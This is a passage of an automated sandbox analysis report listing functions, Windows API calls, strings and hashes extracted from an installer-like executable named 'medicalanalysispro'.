                                                                                                                                                                                                                                                                                                              • LocalFree.KERNEL32 ref: 00007FF7BDE74078
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                                                                              • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                                                                              • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                                                                              • Opcode ID: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
                                                                                                                                                                                                                                                                                                              • Instruction ID: 3bd662c780826b3a54f70267db4edaa63e5cd130d7b70b4ba8164cb5ff09d119
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B311A31A2DA02C6F7A8BB28E815779B6A0FFA6745FC05135DB0D46698FF7DA0058720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE7772C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE7114C: _vsnprintf.MSVCRT ref: 00007FF7BDE71189
                                                                                                                                                                                                                                                                                                              • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7BDE7606F), ref: 00007FF7BDE77763
                                                                                                                                                                                                                                                                                                              • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7BDE7606F), ref: 00007FF7BDE77772
                                                                                                                                                                                                                                                                                                              • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7BDE7606F), ref: 00007FF7BDE777B8
                                                                                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7BDE7606F), ref: 00007FF7BDE777EC
                                                                                                                                                                                                                                                                                                              • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7BDE7606F), ref: 00007FF7BDE77805
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                                                                              • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                                                                              • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                                                                              • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                                                                                                                                                                                                              • Instruction ID: dcc4dc845895709b1335fbe9976edf091f1b38e1d149f13b050097af491f5121
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B317231A0CA41C6E798AB29E8001B9F7A1FFAAB50F958235DB5D07798EF3CD405C710
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE75050 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3370778649-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7a5ca75d91af602fc05094a081090f140e6eed6bd06cfaf2830a0b07ec6e4dcc
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3611293170CB8287EB986B66B844079FAA0FB5EFC1F899538DE0E43758EE3CD4418610
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE72244 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                                                                              • String ID: wininit.ini
                                                                                                                                                                                                                                                                                                              • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                                                                              • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                                                                                                                                                                                                              • Instruction ID: e75f77eb69b3acabb5289957bf4959feb06b6dfd7855a9243fc20cae5282a972
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1114232A08A8187D754AB29E8542B9B7A1FBDE705FC58231DB4E43758EF3CD549CA10
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE73840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                                                                                                                                                                                                                              • String ID: ham
                                                                                                                                                                                                                                                                                                              • API String ID: 761066910-4133487753
                                                                                                                                                                                                                                                                                                              • Opcode ID: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                                                                                                                                                                                                                                                                                              • Instruction ID: e58f3ff77d81ca27af812c5dbc889bd87ace1a001fdf62bce2a4972a3315e8fb
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE11D065A0CA42C6F6DC7B99A8042B8E651EB6BB41FD49131CA1E1639CEF7CA4448620
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE7494C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: FindResourceA.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE75078
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: SizeofResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE75089
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: FindResourceA.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750AF
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: LoadResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750C0
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: LockResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750CF
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: memcpy_s.MSVCRT ref: 00007FF7BDE750EE
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: FreeResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750FD
                                                                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7BDE73388), ref: 00007FF7BDE74975
                                                                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7BDE73388), ref: 00007FF7BDE74A11
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE74DCC: LoadStringA.USER32 ref: 00007FF7BDE74E60
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE74DCC: MessageBoxA.USER32 ref: 00007FF7BDE74EA0
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                                                                              • String ID: <None>$@$FINISHMSG
                                                                                                                                                                                                                                                                                                              • API String ID: 3507850446-4126004490
                                                                                                                                                                                                                                                                                                              • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                                                                                                                                                                                                              • Instruction ID: ec59a35a23bb07834cbf5687ed2d06b2b3290a0d5fad2fff48780b0fa8aadcd4
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF118772A0C64387F7A4AB28E45177AF6A1FFA6754F845134DB4D46698FF3CD0048B24
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE779F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                                                                                              • API String ID: 438848745-3680919256
                                                                                                                                                                                                                                                                                                              • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                                                                                                                                                                                                              • Instruction ID: d39b19902c60c2a5b1118cf0c6927d450e475b61153bb90ed4ce8cba8a52e47b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F118731A1D98285FE95BB18E8402F9B7A0FFAA704FC40131C78D02699EF3DD609C710
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE71500 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1273765764-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                                                                                                                                                                                                                                                                                              • Instruction ID: 31ffe9367544ad6c165519e218430803b87ab122cea452fb3f46119f36e2a712
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A119631A0C78186EA986B18B4043B9F761FB9BB54F845230DB5E063D8DF3CD0458720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE73BF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236windowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                                                                                                                                                                                                                                                              • String ID: ham
                                                                                                                                                                                                                                                                                                              • API String ID: 2312377310-4133487753
                                                                                                                                                                                                                                                                                                              • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4aae12aef20d7c1c61ddb9710930f5afb61da1b196c1f6b191eb8e75796726e1
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78A1A432B1DA5286F7ECAB19944467DE6A4FF66790F910035EB2D43288EF3DE845C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE778B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                                                                              • API String ID: 1065093856-305352358
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                                                                                                                                                                                                              • Instruction ID: c6f09ed41d0f0200a3798fdc7ce199e4f19fe4bde8652f853ed2277635d097c7
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B931A33260D68186EB95AF14E4447BAF760FB9AB94F844234DB9D47798EF7CD408CB20
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE75C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: *MEMCAB
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3211172518
                                                                                                                                                                                                                                                                                                              • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                                                                                                                                                                                                              • Instruction ID: 8a5e6ea120d696b396ddc42215a6720faa75d7c7995af0bc725373193eab14f2
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94314F31A0CB42C5EA94AB19E4443B9BBA1FB56790FD54236D76C42398FF3CE445C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE78470 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6dec6da8cc086e6f0a0122aaac2ef2bdc7c336abfc8fc38892a1bda5a802a9d5
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA41BA39A0CF4181EA99AB1CF890365B368FBAA744F944135DB8D42768FF7CD444C760
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE77AC8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
